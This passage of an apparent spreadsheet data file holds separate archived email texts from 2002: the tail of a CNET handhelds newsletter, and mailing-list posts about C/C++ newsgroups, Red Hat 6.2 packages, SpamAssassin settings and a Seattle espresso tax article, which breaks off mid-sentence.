 When reviewing the Toshiba Pocket PC e740, I spent a lot of time trying to understand its XScale processor. A benchmark provided by Intel seems to indicate that it performs certain operations faster than previous Pocket PCs, but in hands-on use we didn't find any significant difference in performance. I'm still not certain whether I should attribute performance limitation to the operating system (which hasn't been optimized for the new chips), applications (which likewise haven't be optimized), or simply that the new chip isn't that much better than the old StrongARM. But regardless, the e740 is an exceptional Pocket PC and one I don't hesitate to recommend to those looking for a high-powered PDA.
 &lt;!--
 &lt;font size=3 color="#333333"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt; --&gt;&lt;br&gt;
 				&lt;!--
 					&lt;div align=right&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CDzlR2_Nv0T0QkY6b7uR" &gt;Read the full story&lt;/a&gt;  &amp;nbsp;|&amp;nbsp;
 					&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdArfP6VXfuo4I9yc99NcsR" &gt;Check latest price&lt;/a&gt;&lt;/div&gt; --&gt; &lt;br clear="all"&gt;
 					Colin Duwe&lt;br&gt;
 					Associate Editor&lt;br&gt;
 					CNET Electronics
               		&lt;/font&gt;&lt;/td&gt;
             &lt;td width=10&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td bgcolor="#999999"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- most popular --&gt;
         	&lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
         		&lt;TR&gt;&lt;TD colspan=2&gt;&lt;!-- cnet's exclusive downloads --&gt;
 					&lt;A name=h1&gt;&lt;IMG alt="CNET's Exclusive Downloads" height=19 src="http://a.r.tv.com/cnet.1d/i/nl/dl/sub_top10.gif" width=250&gt;&lt;BR&gt;
 					&lt;IMG height=8 src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr valign=top&gt;&lt;td width=50%&gt;
 					&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;In Palm OS:&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;
             		&lt;TABLE border=0 cellPadding=4 cellSpacing=0 width="100%"&gt;
                 		&lt;TR&gt;&lt;TD height=36 width="6%"&gt;&amp;nbsp;&lt;/TD&gt;
                 			&lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 							&lt;B&gt;Most	Popular Titles&lt;/B&gt;&lt;BR&gt;
 							&lt;FONT size=-2&gt;Week ending June 11&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
               			&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
               			&lt;TR align=middle&gt;&lt;TD height=32 width="6%"&gt;
 							&lt;FONT face="ms sans serif, geneva" size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSlDlPdhQ93KjZ6eJcnZR" &gt;Noah Lite English dictionary&lt;/A&gt;
 						&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
               			&lt;TR align=middle&gt;&lt;TD height=32&gt;
 							&lt;FONT face="ms sans serif, geneva" size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpI6SWBkRrAu7hgvo2AKenR" &gt;DopeWars (Palm)&lt;/A&gt;
 							&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLj9fa4buK4JYndFK-AWlrR" &gt;Blocks&lt;/A&gt;
 							&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBP3_d07Ul1okYP2r70U6iR" &gt;Palm Desktop&lt;/a&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
                 			&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHC_AtJ2VFm8il40AWNdR" &gt;Sketcher&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               			&lt;/TR&gt;
               			&lt;TR&gt;&lt;TD colSpan=2&gt;
                   			&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     			&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 							&lt;/TABLE&gt;
 						&lt;/TD&gt;&lt;/TR&gt;
 					&lt;/TABLE&gt;
 					&lt;DIV align=left&gt;&lt;FONT face="arial, helvetica" size=-2&gt;&lt;BR&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKMoK0MFdGkeHaXeD3gBcR" &gt;
 					&lt;B&gt;All popular Palm OS downloads&lt;/B&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 				&lt;/td&gt;
 				&lt;td width"50%"&gt;
 				&lt;FONT size=-1&gt;&lt;B&gt;&lt;FONT face="arial, helvetica"&gt;In Pocket PC:&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 				&lt;TABLE border=0 cellPadding=4 cellSpacing=0 width="100%"&gt;
               		&lt;TR&gt;&lt;TD height=36 width="6%"&gt;&amp;nbsp;&lt;/TD&gt;
                 		&lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 						&lt;B&gt;Most Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending June 11&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
               		&lt;/TR&gt;
                     &lt;TR&gt;&lt;TD colSpan=2&gt;
                   		&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     		&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;&lt;/TR&gt;
               		&lt;TR align=middle&gt;&lt;TD height=32 width="6%"&gt;
 						&lt;FONT face="ms sans serif, geneva" size=-2&gt;1&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyp89AjFbT_PUCch20LgRR" &gt;SimCity2000&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;2&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcz1l053yXYHRf_uaHkFR" &gt;TV Remote Controller&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;3&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDH017vSMJkPhB7mxUT9A9R" &gt;GigaBar&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;4&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fVmZp6DmLwgkaZmRuR" &gt;ActiveSync&lt;/A&gt;
 						&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;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size=-2&gt;5&lt;/FONT&gt;&lt;/TD&gt;
                 		&lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnucArwBwhq6GOxuYzsR" &gt;Syntact Gamebox (Pocket PC)&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
               		&lt;/TR&gt;
               		&lt;TR&gt;&lt;TD colSpan=2&gt;
                   		&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%"&gt;
                     		&lt;TR&gt;&lt;TD bgColor="#cccccc"&gt;&lt;IMG height=1 src="http://a.r.tv.com/cnet.1d/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 						&lt;/TABLE&gt;
 					&lt;/TD&gt;&lt;/TR&gt;
 				&lt;/TABLE&gt;
             	&lt;DIV align=left&gt;&lt;FONT face="arial, helvetica" size=-2&gt;&lt;BR&gt;
 					&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y5qvA_1xmYgHobjqmZR" &gt;&lt;B&gt;All popular PocketPC downloads&lt;/B&gt;&lt;/A&gt;
 				&lt;/FONT&gt;&lt;BR&gt;&lt;/DIV&gt;
 				&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;!-- /most popular --&gt;
 &lt;!-- reviews &amp; features --&gt;
 &lt;TABLE border=0 cellPadding=10 cellSpacing=0 width=430&gt;
           &lt;TR&gt;
           &lt;TD colspan=2&gt;&lt;FONT face="Arial, Helvetica"&gt;&lt;IMG alt="Reviews and Features"
             height=19 src="http://a.r.tv.com/cnet.1d/i/nl/lx/sub_rev.gif" width=200
             NOSEND="1"&gt;&lt;BR&gt;&lt;IMG border=0 height=8 src="http://home.cnet.com/i/nl/rule.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
             &lt;TABLE align=left border=0 cellPadding=0 cellSpacing=0 width=110&gt;
               &lt;TR&gt;&lt;TD&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd819BtQUI3_tvVyn4IcgdR" &gt;
 				&lt;IMG border=0 width="85" height="110" valign="top" src="http://a.r.tv.com/cnet.1d/i/pg/030402palms.jpg" vspace="5"&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 				&lt;!--item 1--&gt;
 							&lt;FONT face="arial, helvetica" size=3&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC3nvGVX4RVXFO5JSrR" &gt;Must-have Palm OS games: Newly updated&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 							&lt;FONT face="arial, helvetica" size=-1&gt;We've listened to reader suggestions, tested the latest games to be released, and now we're ready to present our current list of favorite games for your Palm.
 							&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2FzQq0i6fez6pa6cIJPR" &gt;Read the full story&lt;/a&gt;&lt;!--  &amp;nbsp;|&amp;nbsp;
 							&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6ARP4_RYG8Y0gSPZxnR" &gt;Check latest price&lt;/a&gt; --&gt;
 							&lt;/font&gt;&lt;br clear="all"&gt;&lt;p&gt;
 	&lt;!--item 2--&gt;
 							&lt;FONT face="arial, helvetica" size=3&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVDZkIrkUMBXB6W5WWcR" &gt;Toshiba Pocket PC e740&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 							&lt;FONT face="arial, helvetica" size=-1&gt;Powered by Intel's new 400MHz XScale processor and boasting integrated Wi-Fi connectivity, Toshiba's new PDA is an impressive mobile machine. We got hands on with it to test the new chips and its myriad features. See how it did.
 							&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJGPTPz2HSCN0U7nQUDRR" &gt;Read the review&lt;/a&gt; &amp;nbsp;|&amp;nbsp;
 							&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeTp74yAE64qDAwrPGFR" &gt;Check latest price&lt;/a&gt;
 							&lt;/font&gt;&lt;br clear="all"&gt;
 						&lt;br clear="all"&gt;
 							&lt;div align=left style="padding-top: 20px;"&gt;
 							&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDmt64zMKE-nFr99H29R" &gt;
 							&lt;b&gt;More handhelds reviews &amp;amp; features&lt;/a&gt;&lt;/FONT&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- /reviews features --&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
             &lt;!-- picks of the week --&gt; &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dl/sub_palmpk.gif" width=250 height=19 alt="Picks of the Week"&gt;&lt;br&gt;
                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=100%&gt;
 &lt;tr&gt;&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DTu_vJGZP85eXsJh-uR" &gt;Uninstall Hack 1.59&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 									&lt;font size="-2"&gt;File size: 36.6K&lt;br&gt;
 									License: Free to try; $7.00 to buy&lt;br&gt;&lt;/font&gt;
 									Uninstall Hack is designed to help keep your Palm device running smoothly by monitoring application installations and removing all traces of an
 application during the uninstall process. Uninstall Hack also removes
 leftover files from applications removed using the standard Palm OS delete
 tool, leaving your Palm device clean and trouble-free.
 									&lt;br&gt;&lt;br&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeDtOWJ0pvVdi5Z7edsR" &gt;Quik Budget 3.2&lt;/a&gt;&lt;/b&gt;
 									&lt;br&gt;&lt;br&gt;
 									&lt;font size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9TfuhmqiqzUbrvLkiDZR" &gt;
 									&lt;b&gt;All Palm OS editors' picks&lt;/b&gt;&lt;/a&gt;
 									&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;&lt;tr&gt;
 &lt;td&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/hed_picks.gif" width=260 height=19 alt="Picks of the Week"&gt;&lt;/a&gt;&lt;br&gt;
     &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/rule.gif" width=410 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;table cellpadding=0 cellspacing=0 border=0 width=100%&gt;
 	&lt;td valign=top&gt;
 	&lt;FONT face="arial, helvetica" size=-1&gt;
 									&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vBhrGBRl28NRQSnqQuR" &gt;PictPocket 2.0&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
     								&lt;font size="-2"&gt;File size: 1.09MB &lt;br&gt;
 									License: Free to try; $16.95 to buy&lt;br&gt;&lt;/font&gt;
 									Take your pictures with you on your Pocket PC. PictPocket allows you to
 view and edit several types of digital image files including MPEG-1 and MPEG-2 video, BMP, 2BP, JPG, JPE, JPEG, GIF, and many more, making this a truly mobile multimedia solution.
 		&lt;br&gt;
                 					&lt;br&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3YttdODFWVhZSgRXBsR" &gt;&lt;b&gt;All Windows CE/PocketPC editors' picks&lt;/b&gt;&lt;/a&gt;
 			  						&lt;/font&gt;&lt;/font&gt;
 			  &lt;!--Horizontal Brick--&gt;
 								&lt;P&gt;
 								&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt;
 								&lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;
 								&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 									&lt;TBODY&gt;&lt;TR vAlign=top&gt;
     									&lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
             								&lt;UL&gt;&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jjAFHOOiJGu_NEsnEPR" &gt;Live Tech Help. Submit your question now.&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblYbvLt53xlZk0f-IonR" &gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHlsIRmqwuBXvl3NU2rR" &gt;Find a job you love. Over 1 million postings&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPLmZNXReplrQ8kasp4ZR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt;
 												&lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanykQyy_jvlXdIl9Oi-UidR" &gt;May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV&lt;/A&gt;
 											&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;
 										&lt;/TD&gt;&lt;/TR&gt;
 									&lt;/TBODY&gt;
 								&lt;/TABLE&gt;
 								&lt;/P&gt;
 								&lt;!-- End Horizontal Brick--&gt;
 			  &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;img src="http://a.r.tv.com/cnet.1d/i/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;center&gt;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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dzAPbWk0r9i_f_B0NLncR" &gt;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HREF="http://clickthru.online.com/Click?q=c6-URs9rCLfOFnaxzgMMTVZe8dwuaQ66sRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mDuwHAvpmtTwxp6DtFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4KiNL7cn2fqfAgMcXea9R"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href="http://clickthru.online.com/Click?q=05-gDULIG8WRMaK-HsfnODtxI8fiiuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2Ia7htrjQ1U5MauO37xFR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWECxPzgS8IeOdSKzjX19R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB68VKwZ0m-EDvznhjonleR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMGrYJKW24YOLpk6Td6yR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbBAcPZV3RXvLF34ULXPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e424&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=85-2G3o-gKNokoqVnwlezVayGtOURRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Re: C++ and C Mailing Lists for Beginners and Advanced
</t>
  </si>
  <si>
    <t xml:space="preserve">SoloCDM wrote:
 &gt; David Neary stated the following:
 &gt; &gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++
 &gt; 
 &gt; I tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a
 &gt; typo?
 Yup. It's alt.comp.lang.learn.c-c++ Sorry about that.
 I've never used the group, so I can't vouch for it's usefulness.
 But a few people I respect a lot direct people there for beginner
 type stuff.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Chris wrote :
 &gt; On Tue, 2002-10-08 at 10:36, Matthias Saou wrote:
 &gt; &gt; Hi there,
 &gt; &gt; 
 &gt; &gt; Two new things today :
 &gt; &gt; 
 &gt; &gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old
 &gt; &gt; proprietary IVR software that doesn't work on newer releases :-( So
 &gt; &gt; I've recompiled both the latest apt and openssh packages for it, and
 &gt; &gt; they are now available with a complete "os, updates &amp; freshrpms" apt
 &gt; &gt; repository at apt.freshrpms.net, for those who might be interested.
 &gt; 
 &gt; Gack. Did you try 7.3 with the compat-glibc first? Or does it require an
 &gt; antique kernel?
 It requires a 2.2 kernel, plus antique just-about-everything :-/ Real crap!
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.00 0.03 0.00
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SunMSapple meta4 of the day
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Im feeling a bit farklempt having spent the night at Todais with the
 family so talk amongst yourself..here Ill give you a topic
 The current state of IT can be thought of in terms of the Cold war with
 the US and the UUSR being MS and Sun/IBM/OSS (does it matter which side
 is which?), Apple as Cuba and the US legal system as the UN.
 Discuss.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:20 PM -0500 8/13/02, Mike Burger wrote:
 &gt;Make sure you have this in your .spamassassin/user_prefs:
 This might be a problem.  I'll have to look into it further.  I just 
 got SA working yesterday.  It's being called from MIMEDefang.  I'm 
 not sure if it will look for user preferences when run like that. 
 One would hope it would be I can't say for certain.  I'll look in to 
 it.
 &gt;# By default, the subject lines of suspected spam will be tagged.
 &gt;# This can be disabled here.
 &gt;#
 &gt;rewrite_subject 0
 Yeah, I disabled the subject rewrite.  I also lowered required_hits 
 to 1 (wonder if I can do zero) so that almost all mail is scored--I'm 
 testing it right now.  auto_report_threshold was raised to 100 to 
 make sure that all mail gets through to me for now.
 &gt;# By default, spamassassin will include its report in the body
 &gt;# of suspected spam. Enabling this causes the report to go in the
 &gt;# headers instead. Using 'use_terse_report' for this is recommended.
 &gt;#
 &gt;report_header 1
 Ah, now I didn't notice this.  I rather like this option.  I may set 
 my global default to this.
 &gt;The first tells it not to add *****SPAM***** to the subject, the second
 &gt;tells it to put the report in the headers, instead of the body.
 &gt;
 &gt;If the report is in the headers, it won't be calculated in the
 &gt;razor-check.
 This makes sense.  I may do that for just this reason.  Thanks!
 Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR      Pittsburg State University
 Network &amp; Systems Manager       Kelce 157Q
 Office of Information Systems   Pittsburg, KS 66762
 Voice: (620) 235-4606           Fax: (620) 235-4545
 http://www.pittstate.edu/ois/
 Warning:  This message has been quadruple Rot13'ed for your protection.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</si>
  <si>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Re: Polit-spam
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Gary Lawrence Murphy" &lt;garym@canada.com&gt;
 &gt;
 &gt; &gt;&gt;&gt;&gt;&gt; "w" == wpin  &lt;lslifriend&gt; writes:
 &gt;
 &gt;     w&gt; Those who want to leave for the Netherlands to carry on any
 &gt;     w&gt; kind of education,including for PHD, must be careful
 &gt;     w&gt; . Especially the university of Groningen(RUG) should be
 &gt;     w&gt; avoided. This university was once a good one but now it has
 &gt;     w&gt; lost its reputation. ... Studying is a good investment in time
 &gt;     w&gt; and money. So invest in the right place and time. You are
 &gt;     w&gt; warned.
 Dear gawd - 'lost its reputation' - how horrible for those Northern
 Europeans. What could possibly be worse than that?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: Goodbye Global Warming
</t>
  </si>
  <si>
    <t xml:space="preserve">
 How about this:   A bored FoRKer said:  "YAWN"
 I believe Tom had it right.   Signal not noise.
 I'll start:
               Los Angeles Times September 23, 2002 Monday
                    Copyright 2002 / Los Angeles Times
                             Los Angeles Times
 September 23, 2002 Monday  Home Edition
 SECTION: Main News Main News; Part 1; Page 13; National Desk
 LENGTH: 1013 words
 BYLINE: DANA CALVO, TIMES STAFF WRITER
 DATELINE: SEATTLE
 BODY:
 The idea came at the end of a long, frustrating brown-bag session at a
 public-policy think tank here.
 The challenge was to save the city's child-care programs. Staring into
 his empty coffee cup, the meeting coordinator's mind landed on an
 unlikely solution: Put a tax--just a "benign" dime a shot--on
 espresso.
 That led to a petition signed by more than 20,000 Seattle residents,
 and next year, voters will decide whether the tax becomes law, one
 that taps right into Seattle's legendary addiction to coffee. This is,
 after all, the town where Starbucks was born and where the $12 pound
 of beans became a staple. There is one Starbucks for every 7,000
 residents in Seattle, compared to one per 64,000 in New York. Seattle
 also has two other major coffee chains, Tully's Coffee and Seattle's
 Best Coffee, as well as countless cafes and espresso carts.
 A recent poll showed that 74% of Seattle residents would vote for the
 tax. "For people outside of Seattle who don't understand the
 consumption of espresso, [the tax proposal] can be seen as crazy,"
 said John Burbank, the think tank's executive director, "but it was
 common sense."
 Research by his nonprofit Economic Opportunity Institute showed that
 people preferred a tax on liquor or beer over one on espresso. But
 because of the large number of lattes and cappuccinos sold, a tax on
 espresso could be lower than one levied on alcohol.
 Burbank estimates the tax could generate $7 million to $10 million a
 year. City Council aides dispute his figures, saying their research
 shows the tax would bring in $1.5 million to $3 million a year.
 Burbank's institute is funded by foundations and labor unions. The
 think tank's mission is to promote public policy in the interests of
 low-income people, and it has long championed child-care issues.
 Burbank says the tax would restore cuts to the child-care programs
 made earlier this year by Gov. Gary Locke. He also says it would
 provide more low-income families with subsidies for child care,
 improve preschool programs and increase teacher salaries.
 At Bauhaus Books &amp; Coffee, the sidewalk is dotted with tables of
 customers for whom coffee is a half-day activity, not just a drink.
 Espresso lovers like Chris Altman, who at a dime a day would spend an
 extra $36.50 a year, said the investment is worth it. "I'm OK with
 it," said the 35-year-old, stirring his iced latte. "The money's got
 to come from somewhere."
 Hope Revuelto, 25, was cooling her regular coffee ($1 because she
 brought her own mug) and reading "Zen and the Art of Pottery." She
 supports the initiative and said its critics are behaving as would be
